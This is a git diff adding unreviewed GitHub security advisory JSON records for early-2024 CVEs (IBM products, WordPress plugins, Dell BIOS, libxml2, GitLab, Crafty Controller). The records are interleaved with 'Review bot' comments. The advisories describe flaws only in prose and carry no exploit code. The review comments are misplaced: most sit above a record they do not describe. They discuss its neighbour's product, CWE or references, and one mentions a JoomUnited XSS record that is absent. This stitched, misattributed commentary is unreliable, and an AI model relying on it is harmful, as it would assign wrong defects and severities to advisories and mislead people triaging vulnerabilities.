\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wwpc-m88m-frjm/GHSA-wwpc-m88m-frjm.json b/advisories/unreviewed/2024/02/GHSA-wwpc-m88m-frjm/GHSA-wwpc-m88m-frjm.json
new file mode 100644
index 0000000000000..4aea39746667a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wwpc-m88m-frjm/GHSA-wwpc-m88m-frjm.json
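Review bot: `details` reads `"allows Reflected XSS.This issue affects JoomUnited"` with no space after the sentence-ending period, and ends with a trailing `\n\n`; the text arrived that way from the source, but it is what users see on the advisory page, so a small cleanup pass (insert the missing space, strip trailing newlines) is worth doing on import. The identical `"XSS.This issue affects"` artefact is in GHSA-x5rp-83c9-9fm7 in this same batch.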
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wwpc-m88m-frjm",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-02-03T03:30:27Z",
+ "aliases": [
+ "CVE-2023-30999"
+ ],
+ "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption. IBM X-Force ID: 254651.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30999"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254651"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7106586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T01:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wx33-9hcf-h8wc/GHSA-wx33-9hcf-h8wc.json b/advisories/unreviewed/2024/02/GHSA-wx33-9hcf-h8wc/GHSA-wx33-9hcf-h8wc.json
new file mode 100644
index 0000000000000..8c0b5290d02b5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wx33-9hcf-h8wc/GHSA-wx33-9hcf-h8wc.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wx33-9hcf-h8wc",
+ "modified": "2024-02-02T06:30:31Z",
+ "published": "2024-02-02T06:30:31Z",
+ "aliases": [
+ "CVE-2023-38020"
+ ],
+ "details": "IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow an authenticated user to manipulate output written to log files. IBM X-Force ID: 260576.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38020"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260576"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7111679"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-117"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T04:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wxfh-8hrr-vfjw/GHSA-wxfh-8hrr-vfjw.json b/advisories/unreviewed/2024/02/GHSA-wxfh-8hrr-vfjw/GHSA-wxfh-8hrr-vfjw.json
new file mode 100644
index 0000000000000..aa87297079bcd
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wxfh-8hrr-vfjw/GHSA-wxfh-8hrr-vfjw.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wxfh-8hrr-vfjw",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2024-0844"
+ ],
+ "details": "The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with \"Form.php\" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0844"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T12:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wxhv-5vpx-mrm3/GHSA-wxhv-5vpx-mrm3.json b/advisories/unreviewed/2024/02/GHSA-wxhv-5vpx-mrm3/GHSA-wxhv-5vpx-mrm3.json
new file mode 100644
index 0000000000000..16d0e14268eed
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wxhv-5vpx-mrm3/GHSA-wxhv-5vpx-mrm3.json
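Review bot: The CVSS vector `C:L/I:L/A:L` with the `"MODERATE"` label sits oddly next to a `details` text that says the flaw allows "the execution of any PHP code" on the server; the vector is copied from the source feed, but a curator should confirm the impact sub-scores before this record is used for prioritisation, since low-impact metrics on a code-execution finding tend to be a data-entry artefact rather than an assessment. The `"modified"` timestamp being later than `"published"` is expected for an updated record and needs no change.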
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wxhv-5vpx-mrm3",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-50941"
+ ],
+ "details": "IBM PowerSC 1.3, 2.0, and 2.1 does not provide logout functionality, which could allow an authenticated user to gain access to an unauthorized user using session fixation. IBM X-Force ID: 275131.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50941"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275131"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7113759"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-384"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x2cq-3g4m-wg8x/GHSA-x2cq-3g4m-wg8x.json b/advisories/unreviewed/2024/02/GHSA-x2cq-3g4m-wg8x/GHSA-x2cq-3g4m-wg8x.json
new file mode 100644
index 0000000000000..3fbda7498caee
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x2cq-3g4m-wg8x/GHSA-x2cq-3g4m-wg8x.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x2cq-3g4m-wg8x",
+ "modified": "2024-02-06T00:30:28Z",
+ "published": "2024-02-06T00:30:28Z",
+ "aliases": [
+ "CVE-2024-1209"
+ ],
+ "details": "The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/karlemilnikka/CVE-2024-1209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.learndash.com/release-notes/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x2h7-3cpj-7r74/GHSA-x2h7-3cpj-7r74.json b/advisories/unreviewed/2024/02/GHSA-x2h7-3cpj-7r74/GHSA-x2h7-3cpj-7r74.json
new file mode 100644
index 0000000000000..f01eaa844d3f0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x2h7-3cpj-7r74/GHSA-x2h7-3cpj-7r74.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x2h7-3cpj-7r74",
+ "modified": "2024-02-02T21:31:29Z",
+ "published": "2024-02-02T21:31:29Z",
+ "aliases": [
+ "CVE-2024-1193"
+ ],
+ "details": "A vulnerability was found in Navicat 12.0.29. It has been rated as problematic. This issue affects some unknown processing of the component MySQL Conecction Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252683. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1193"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/24-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252683"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252683"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x379-72wq-8vwf/GHSA-x379-72wq-8vwf.json b/advisories/unreviewed/2024/02/GHSA-x379-72wq-8vwf/GHSA-x379-72wq-8vwf.json
new file mode 100644
index 0000000000000..b6188d8f3ccb3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x379-72wq-8vwf/GHSA-x379-72wq-8vwf.json
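Review bot: Apart from the NVD entry, the references here are a third-party text file and two VulDB pages, and `details` itself says the vendor never responded, so the record carries no fix, patched version or vendor mitigation a reader can act on; with `affected` also empty, a consumer gets an advisory it can neither match nor remediate from. The same reference profile — project pointer plus an unaffiliated write-up, no `"type": "FIX"` or vendor advisory — appears in GHSA-xcg4-rx98-2f6x and GHSA-xf6f-94pc-55vc in this batch; where a fix reference exists it should be added, and where none does, the record should say so rather than leave the reader to infer it. The `details` text also preserves the upstream typo "Conecction"; it came in that way and a cleanup is optional.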
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x379-72wq-8vwf",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2023-28063"
+ ],
+ "details": "\nDell BIOS contains a Signed to Unsigned Conversion Error vulnerability. A local authenticated malicious user with admin privileges could potentially exploit this vulnerability, leading to denial of service.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28063"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000214780/dsa-2023-176-dell-client-bios-security-update-for-a-signed-to-unsigned-conversion-error-vulnerability"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-195"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T08:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json b/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json
new file mode 100644
index 0000000000000..ceec251fc822e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x3vr-472g-gmxm",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2023-43017"
+ ],
+ "details": "IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access. IBM X-Force ID: 266155.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43017"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/266155"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7106586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-295"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x4hh-7hpg-jmcg/GHSA-x4hh-7hpg-jmcg.json b/advisories/unreviewed/2024/02/GHSA-x4hh-7hpg-jmcg/GHSA-x4hh-7hpg-jmcg.json
new file mode 100644
index 0000000000000..99a6b5475a435
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x4hh-7hpg-jmcg/GHSA-x4hh-7hpg-jmcg.json
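Review bot: `cwe_ids` is `"CWE-295"` (improper certificate validation) while `details` describes a privileged user installing a configuration file that enables remote access, which reads as a privilege or configuration weakness rather than a certificate-checking one; the mapping comes from the source feed, so it may be correct for reasons the text does not show, but it looks worth confirming against the IBM bulletin before it feeds any CWE-based reporting. The ibm.com support page is the same URL as in GHSA-wwpc-m88m-frjm, which is plausible for a combined bulletin but is another reason to check that both records point at the right fix information.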
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x4hh-7hpg-jmcg",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22319"
+ ],
+ "details": "IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote attacker to conduct an LDAP injection. By sending a request with a specially crafted request, an attacker could exploit this vulnerability to inject unsanitized content into the LDAP filter. IBM X-Force ID: 279145.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22319"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279145"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7112382"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74",
+ "CWE-90"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T03:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x547-pm2q-2cr6/GHSA-x547-pm2q-2cr6.json b/advisories/unreviewed/2024/02/GHSA-x547-pm2q-2cr6/GHSA-x547-pm2q-2cr6.json
new file mode 100644
index 0000000000000..28c3a2be44f0f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x547-pm2q-2cr6/GHSA-x547-pm2q-2cr6.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x547-pm2q-2cr6",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-06T03:32:59Z",
+ "aliases": [
+ "CVE-2023-46360"
+ ],
+ "details": "Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier is vulnerable to Execution with Unnecessary Privileges.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46360"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://hardy.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x5c7-28cx-8rh5/GHSA-x5c7-28cx-8rh5.json b/advisories/unreviewed/2024/02/GHSA-x5c7-28cx-8rh5/GHSA-x5c7-28cx-8rh5.json
new file mode 100644
index 0000000000000..138b5ac79b893
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x5c7-28cx-8rh5/GHSA-x5c7-28cx-8rh5.json
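Review bot: The third reference, `"url": "http://hardy.com"`, is a bare plain-HTTP domain with no path, and nothing on the page ties that domain to the vendor of the Hardy Barth cPH2 charger named in `details`; a reference that cannot be verified as the vendor's site should be dropped or replaced with the vendor advisory rather than published, since readers treat advisory references as vetted. If it is kept, it should at least be `https://` like every other link in this batch.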
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x5c7-28cx-8rh5",
+ "modified": "2024-02-02T00:31:27Z",
+ "published": "2024-02-02T00:31:27Z",
+ "aliases": [
+ "CVE-2023-36496"
+ ],
+ "details": "Delegated Admin Privilege virtual attribute provider plugin, when enabled, allows an authenticated user to elevate their permissions in the Directory Server.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36496"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.pingidentity.com/r/en-us/pingdirectory-93/ynf1693338390284"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.pingidentity.com/s/article/SECADV039"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.pingidentity.com/en/resources/downloads/pingdirectory-downloads.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-269"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x5rp-83c9-9fm7/GHSA-x5rp-83c9-9fm7.json b/advisories/unreviewed/2024/02/GHSA-x5rp-83c9-9fm7/GHSA-x5rp-83c9-9fm7.json
new file mode 100644
index 0000000000000..e04474425b02c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x5rp-83c9-9fm7/GHSA-x5rp-83c9-9fm7.json
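Review bot: `details` never names the product or a version — it only says "Delegated Admin Privilege virtual attribute provider plugin" and "the Directory Server" — and the reader has to infer PingDirectory from the reference URLs; with `affected` empty there is no other field carrying that information. The vendor advisory `SECADV039` is referenced, so the importer could at least prefix the product name from the CVE's affected-product data, or a curator should add it, so the record is searchable by product.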
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x5rp-83c9-9fm7",
+ "modified": "2024-02-01T12:30:23Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51685"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LJ Apps WP Review Slider allows Stored XSS.This issue affects WP Review Slider: from n/a through 12.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51685"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/wp-facebook-reviews/wordpress-wp-review-slider-plugin-12-7-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x62r-6wv3-49pm/GHSA-x62r-6wv3-49pm.json b/advisories/unreviewed/2024/02/GHSA-x62r-6wv3-49pm/GHSA-x62r-6wv3-49pm.json
new file mode 100644
index 0000000000000..64ea4cdf40e3e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x62r-6wv3-49pm/GHSA-x62r-6wv3-49pm.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x62r-6wv3-49pm",
+ "modified": "2024-02-02T00:31:25Z",
+ "published": "2024-02-02T00:31:25Z",
+ "aliases": [
+ "CVE-2023-4472"
+ ],
+ "details": "Objectplanet Opinio version 7.22 and prior uses a cryptographically weak pseudo-random number generator (PRNG) coupled to a predictable seed, which could lead to an unauthenticated account takeover of any user on the application.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4472"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2024/MNDT-2024-0002.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.objectplanet.com/opinio/changelog.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-335"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T22:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json b/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json
new file mode 100644
index 0000000000000..3d75f180cfc60
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x74g-xc7p-4fx7/GHSA-x74g-xc7p-4fx7.json
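Review bot: `severity` is an empty array and `database_specific.severity` is `null` even though `details` describes an unauthenticated account takeover of any user via a predictable PRNG seed, which is about as severe as an application flaw gets; the source had no CVSS at import time, but a record that says "no severity" for this finding will be sorted to the bottom by every consumer that ranks by score. A curator should supply a vector or at least a `database_specific.severity` once one is published, and the importer could flag records with a `cwe_ids` entry (here `"CWE-335"`) but no severity as needing follow-up, since that combination indicates a partially processed entry.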
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x74g-xc7p-4fx7",
+ "modified": "2024-02-08T12:30:48Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2023-6564"
+ ],
+ "details": "An issue has been discovered in GitLab EE Premium and Ultimate affecting versions 16.4.3, 16.5.3, and 16.6.1. In projects using subgroups to define who can push and/or merge to protected branches, there may have been instances in which subgroup members with the Developer role were able to push or merge to protected branches.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6564"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/gitlab-com/gl-infra/production/-/issues/17213"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-285"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T12:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x77r-6xxm-wjmx/GHSA-x77r-6xxm-wjmx.json b/advisories/unreviewed/2024/02/GHSA-x77r-6xxm-wjmx/GHSA-x77r-6xxm-wjmx.json
new file mode 100644
index 0000000000000..4927cdf5ee0e4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x77r-6xxm-wjmx/GHSA-x77r-6xxm-wjmx.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x77r-6xxm-wjmx",
+ "modified": "2024-02-04T18:30:19Z",
+ "published": "2024-02-04T18:30:19Z",
+ "aliases": [
+ "CVE-2024-25062"
+ ],
+ "details": "An issue was discovered in libxml2 before 2.11.7 and 2.12.x before 2.12.5. When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25062"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/604"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.gnome.org/GNOME/libxml2/-/tags"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T16:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-x848-fc4r-xcw9/GHSA-x848-fc4r-xcw9.json b/advisories/unreviewed/2024/02/GHSA-x848-fc4r-xcw9/GHSA-x848-fc4r-xcw9.json
new file mode 100644
index 0000000000000..b7fd20ee0eb30
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-x848-fc4r-xcw9/GHSA-x848-fc4r-xcw9.json
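Review bot: `details` states fixed versions precisely ("before 2.11.7 and 2.12.x before 2.12.5"), yet neither an `affected` range nor a `"type": "FIX"` reference captures them, and the second WEB reference is the generic libxml2 tags page rather than the 2.11.7 / 2.12.5 release entries; libxml2 is a widely vendored dependency, so a consumer scanning this record gets no machine-readable version boundary it could use. The fixed-version text is already on the page, so encoding it is a data-entry step, not new research.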
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x848-fc4r-xcw9",
+ "modified": "2024-02-03T09:30:18Z",
+ "published": "2024-02-03T09:30:18Z",
+ "aliases": [
+ "CVE-2024-1064"
+ ],
+ "details": "A host header injection vulnerability in the HTTP handler component of Crafty Controller allows a remote, unauthenticated attacker to trigger a Denial of Service (DoS) condition via a modified host header",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1064"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/crafty-controller/crafty-4/-/issues/327"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-644"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T09:15:11Z"
+ }
+}
